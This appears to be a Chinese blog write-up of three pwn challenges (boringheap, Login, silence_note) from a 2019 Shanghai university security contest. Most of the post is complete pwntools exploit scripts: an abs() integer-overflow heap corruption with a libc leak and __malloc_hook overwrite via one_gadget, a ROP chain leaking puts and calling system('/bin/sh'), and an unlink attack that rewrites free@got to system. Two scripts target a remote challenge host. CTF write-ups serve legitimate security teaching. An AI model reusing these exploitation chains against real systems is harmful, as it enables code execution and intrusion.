上海大学生网络安全PWN_wp

Whali3n51 发布于 2019-11-11

最近没怎么更新博客,太忙了,最近的比赛有点多。

0x01 boringheap

这一道题的关键是 abs() 的整型溢出:32 位补码下 abs(0x80000000) 的结果仍然是 0x80000000(即 INT_MIN,在 C 标准里这是未定义行为,但实际实现就是返回这个负数),所以输入 0x80000000 时得到的不是一个非负偏移,而是一个负数。在这一题里面输入 0x80000000 后,再和 0x40 取余,会得到 -0x20,于是写入位置落到了该 chunk 的前面,最终能越界改写该 chunk 的 chunk 头(size 字段)。

from pwn import *
# Remote target for the boringheap challenge.  The libc below is the local
# system libc and is assumed to match the one on the remote box (the
# __malloc_hook / main_arena arithmetic further down depends on it -- TODO
# confirm against the libc shipped with the challenge).
HOST, PORT = "8sdafgh.gamectf.com", 10001
p = remote(HOST, PORT)
context.log_level = "debug"
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def free(index):
    """Menu option 3: delete the note stored at ``index``.

    Waits for the menu footer ("5.Exit"), picks "3", then answers the
    index prompt with the decimal string form of ``index``.
    """
    dialogue = (
        ('5.Exit\n', "3"),
        ('Which one do you want to delete?', str(index)),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)


def create(typd, content):
    """Menu option 1: allocate a new note.

    ``typd`` is the size class answered to the "1.Small/2.Medium/3.Large"
    prompt; ``content`` is sent verbatim (no newline appended) after the
    "Input Content:" prompt, so callers add their own '\\n' when needed.
    """
    choose = p.sendlineafter
    choose('5.Exit\n', "1")
    choose('3.Large\n', str(typd))
    p.sendafter("Input Content:", content)


def edit(index, size, content):
    """Menu option 2: overwrite note ``index`` starting at offset ``size``.

    ``size`` is the answer to "Where you want to update?"; the challenge's
    abs()/modulo handling of that value is what the 0x80000000 trick in the
    exploit abuses.  ``content`` is sent raw after "Input Content:".
    """
    prompts = (
        ('5.Exit\n', "2"),
        ('Which one do you want to update?\n', str(index)),
        ("Where you want to update?\n", str(size)),
    )
    for prompt, reply in prompts:
        p.sendlineafter(prompt, reply)
    p.sendafter('Input Content:\n', content)
def show(index):
    """Menu option 4: print note ``index``; the caller parses the output."""
    steps = [('5.Exit\n', "4"), ('Which one do you want to view?', str(index))]
    for prompt, reply in steps:
        p.sendlineafter(prompt, reply)


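#p=process("./pwn")
# ---- Stage 1: heap layout ---------------------------------------------------
# Four size-class-2 notes (0x40-byte chunks at heap offsets 0x00/0x40/0x80/
# 0xc0 per the original notes) plus two size-class-1 notes behind them so the
# enlarged chunk below does not run into the top chunk.
create(2, 'A\n')  # note 0 @ 0x00
create(2, 'A\n')  # note 1 @ 0x40
create(2, 'A\n')  # note 2 @ 0x80
create(2, 'A\n')  # note 3 @ 0xc0
create(1, 'A\n')  # note 4
create(1, 'A\n')  # note 5

# ---- Stage 2: abs() overflow -> negative offset -> corrupt note 1's size -----
# An offset of 0x80000000 comes out of the challenge's abs()/modulo as a
# negative offset, so the write starts *before* note 1's data and the last
# qword (0xf1) lands on note 1's size field, making it a 0xf0 chunk that
# overlaps notes 2 and 3.
edit(1, 0x80000000, 'A' * 0x18 + p64(0xf1) + '\n')

# ---- Stage 3: libc leak through the unsorted bin -----------------------------
# The 0xf0 chunk is too big for a fastbin, so it goes to the unsorted bin; the
# next 0x40 request is carved off its front and the remainder's fd/bk
# (main_arena+88) are written into memory that note 2 still points at.
free(1)
create(2, 'A\n')  # note 6
show(2)
p.recv(6)  # fixed prefix printed before the note body (length is empirical)
leak = u64(p.recv(6).ljust(8, '\x00'))
# main_arena+88 == __malloc_hook + 0x10 + 88 for this libc layout.
libc_base = leak - libc.symbols["__malloc_hook"] - 0x10 - 88
success("libc_base====>0x%x" % libc_base)
# A mis-parsed leak would otherwise be fed straight into the __malloc_hook
# write below; libc is mapped page-aligned, so bail out if it is not.
if libc_base & 0xfff:
    raise RuntimeError("implausible libc base 0x%x - leak mis-parsed?" % libc_base)
pause()

# ---- Stage 4: fastbin fd poisoning towards main_arena ------------------------
# Notes 7 and 8 are allocated on top of notes 2 and 3 (overlap from stage 2),
# giving us a write into chunks we can also free.  The fake chunk sits just
# past __malloc_hook, i.e. inside main_arena (NOTE(review): the exact fake
# size/top-pointer dance below is what the author worked out in gdb; re-verify
# it against the target libc before reuse).
create(2, 'A\n')  # note 7 == note 2's chunk
create(3, 'A\n')  # note 8 == note 3's chunk
fake_chunk_addr = libc_base + libc.symbols["__malloc_hook"] + 0x10 + 0x10
free(2)
edit(7, 0, p64(0x51) + '\n')  # writes 0x51 into freed note 2's fd slot
create(2, 'A\n')  # note 9: takes note 2's chunk back
__malloc_hook = libc_base + libc.symbols["__malloc_hook"]
free(8)
edit(3, 0, p64(fake_chunk_addr) + '\n')  # poison freed note 8's fd
create(3, 'A\n')  # note 10: note 8's chunk comes back
create(3, '\x00' * 0x38 + p64(__malloc_hook - 0x10))  # carve the fake chunk
# Put the 0x40 fastbin back into a sane state (fd = 0) before the final malloc.
free(9)
edit(7, 0, p64(0) + '\n')
create(2, 'A\n')  # note 11

# ---- Stage 5: __malloc_hook -> one_gadget ------------------------------------
# These offsets are for one particular libc build (the ones one_gadget prints
# for the Ubuntu 16.04 glibc 2.23 libc); regenerate them for any other target.
one_offset = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one = libc_base + one_offset[3]
create(3, p64(one) + '\n')
# Any further malloc() now goes through the hook; start one without content.
p.sendlineafter('5.Exit\n', "1")
p.sendlineafter("3.Large\n", str(1))
p.interactive()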

0x02 Login

这一题有两种思路:一种是去爆破密码;另一种是绕过密码验证,利用 puts 泄露 GOT 表中的 libc 地址,算出 libc 基址后把调用改成 system("/bin/sh"),最后 getshell。

from pwn import *
#p=process("./login")
# Remote target for the Login challenge.  The libc is the local system libc
# and is assumed to match the remote one (the puts/system/"/bin/sh" offsets
# below depend on it -- TODO confirm).  ``elf`` is the challenge binary and
# is only used for its PLT/GOT addresses.
HOST, PORT = "8sdafgh.gamectf.com", 20000
p = remote(HOST, PORT)
context.log_level = "debug"
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF("./login")
def free(index):
    """Menu option 3: delete the user record with id ``index``."""
    dialogue = (('Choice:\n', "3"), ("Input the user id:\n", str(index)))
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)


def create(index, size, content):
    """Menu option 2: create user ``index`` with a ``size``-byte password.

    ``content`` is the password bytes, sent raw after "Input password:"
    (no newline is appended).
    """
    answers = [
        ('Choice:\n', "2"),
        ("Input the user id:\n", str(index)),
        ('Input the password length:\n', str(size)),
    ]
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
    p.sendafter("Input password:\n", content)


def edit(index, content):
    """Menu option 4: replace user ``index``'s password with ``content`` (raw)."""
    ask = p.sendlineafter
    ask('Choice:\n', "4")
    ask("Input the user id:\n", str(index))
    p.sendafter('Input new pass:\n', content)


def show(index, size, content):
    """Menu option 1: log in as user ``index`` with a ``size``-byte password.

    ``content`` is sent raw after "Input the password:".  The exploit uses
    an oversized ``size`` here to push a ROP chain through this prompt.
    """
    answers = [
        ('Choice:\n', "1"),
        ("Input the user id:\n", str(index)),
        ('Input the passwords length:\n', str(size)),
    ]
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
    p.sendafter('Input the password:\n', content)


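# ---- Stage 1: reuse user 0's freed record -------------------------------------
# User 0 is created and deleted, then user 1's 0x18-byte password is allocated
# into the chunk user 0's record used to occupy.  The two qwords written look
# like a pointer plus a code address inside the binary (NOTE(review): what the
# record fields mean was worked out in gdb; confirm before reusing this).
create(0, 0x20, '\n')
free(0)
create(1, 0x18, p64(0x400310) + p64(0x400F2B))

# ---- Stage 2: leak puts@libc via an overlong login ---------------------------
# Logging in as user 0 with a 255-byte password runs a ROP chain:
#   pop rdi; ret -> puts@plt(puts@got) -> back into the binary at 0x400710 so
# we get a second login.  Gadget/re-entry addresses are static (non-PIE).
POP_RDI = 0x400f33   # presumably `pop rdi; ret` from __libc_csu_init
REENTRY = 0x400710   # address the chain returns to after the leak
show(0, 255,
     '\x00' * 0x10 + p64(POP_RDI) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(REENTRY))
libc_base = u64(p.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.symbols['puts']
print(hex(libc_base))
# recvuntil('\x7f') is a loose parse; refuse to continue on a non-page-aligned
# base rather than feeding garbage to system().
if libc_base & 0xfff:
    raise RuntimeError("implausible libc base 0x%x - leak mis-parsed?" % libc_base)
pause()

# ---- Stage 3: swap the record's pointer/callback for "/bin/sh"/system -------
# next() instead of .next() so this line is not Python-2-only.
binsh = libc_base + next(libc.search('/bin/sh'))
system = libc_base + libc.symbols['system']
edit(1, p64(binsh) + p64(system))
# Logging in as user 0 again now goes through system() with "/bin/sh".
show(0, 0x10, '/bin/sh\x00')
#gdb.attach(p)
p.interactive()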

0x03 silence_note

这道题比赛的时候没有做出来,主要是自己太菜了,眼瞎了:看见限制这么多条件,一直想着怎么去绕过这些条件,却没看出摆在眼前的 unlink 漏洞。这道题是我赛后复现出来的。

from pwn import *
# Local-only setup for silence_note (no remote endpoint in this writeup).
# ``elf`` provides the GOT/PLT addresses used by the unlink primitive; the
# libc must be the one the local process actually loads, since the
# calloc/system offsets are taken from it.
BINARY = "./silent_note"
elf = ELF(BINARY)
p = process(BINARY)
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = 'debug'
def create(opt, content):
    """Menu option 1: allocate the note of size class ``opt`` (1 = Small,
    2 = Large per the prompt) and fill it with ``content`` (sent raw)."""
    for prompt, reply in (("Exit\n", '1'), ("Large\n", str(opt))):
        p.sendlineafter(prompt, reply)
    p.sendafter("Content:\n", content)
def free(opt):
    """Menu option 2: free the note of size class ``opt``.

    The program keeps one pointer per size class and (as the exploit relies
    on) does not clear it, so calling this twice on the same class is the
    double free the chain starts with.
    """
    pick = p.sendlineafter
    pick("Exit\n", '2')
    pick("Large\n", str(opt))

def edit(opt, content):
    """Menu option 3: overwrite the note of size class ``opt`` with ``content``.

    Writes go through the stored pointer even after the note was freed,
    which is the UAF write the fake-chunk/unlink setup needs.
    """
    dialogue = [("Exit\n", '3'), ("Large\n", str(opt))]
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
    p.sendafter("Content:\n", content)
def hack():
    """Answer the menu prompt with 0x500 '1' characters instead of a choice.

    The rest of the chain depends on this oversized menu input (presumably
    it corrupts the note state via the menu's input handling -- verify in
    the binary before reusing).
    """
    junk = '1' * 0x500
    p.sendlineafter("Exit\n", junk)

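# ---- Stage 1: double free + UAF write of a fake chunk ------------------------
create(1, '\n')   # small note
create(2, '\n')   # large note, directly behind it
free(1)
hack()            # oversized menu input; needed for the second free to pass
free(1)
# .bss slot holding the small note's pointer (non-PIE binary).  The classic
# unlink primitive: fake chunk with fd = &slot-0x18, bk = &slot-0x10 so the
# fd->bk == bk->fd == chunk check passes, then the large note's free()
# consolidates backwards into it and writes &slot-0x18 into the slot.
small_ptr = 0x6020d0
edit(1, p64(0) + p64(0x20) + p64(small_ptr - 0x18) + p64(small_ptr - 0x10) + p64(0x20))
free(2)

# ---- Stage 2: turn the pointer slots into an arbitrary-write primitive -------
# small slot now points 0x18 below itself; write through it so the small slot
# points at 0x6020c8, one qword before itself.
edit(1, p64(0) * 3 + p64(0x6020c8) + '\n')
# From 0x6020c8: keep the small slot at 0x6020c8 and aim the next slot
# (presumably the large note's pointer) at free@got.
edit(1, p64(0) + p64(0x6020c8) + p64(elf.got['free']) + p64(0) * 2)
edit(2, p64(elf.symbols['puts']) + '\n')   # free@got = puts@plt
# Point the large slot at calloc@got; "freeing" it now calls puts(calloc@got).
edit(1, p64(0) + p64(0x6020c8) + p64(elf.got['calloc']) + p64(0) * 2)
free(2)
leak_libc = u64(p.recv(6).ljust(8, '\x00')) - libc.symbols['calloc']
success("libc_base====>0x%x" % leak_libc)
# Stop here on a mis-parsed leak instead of pointing free@got at garbage.
if leak_libc & 0xfff:
    raise RuntimeError("implausible libc base 0x%x - leak mis-parsed?" % leak_libc)
pause()

# ---- Stage 3: free@got = system, then free("/bin/sh") ------------------------
edit(1, p64(0) + p64(0x6020c8) + p64(elf.got['free']) + p64(0) * 2)
edit(2, p64(leak_libc + libc.symbols['system']) + '\n')
create(1, '/bin/sh\x00\n')   # NUL-terminated so the trailing newline is ignored
free(1)                      # -> system("/bin/sh")
p.interactive()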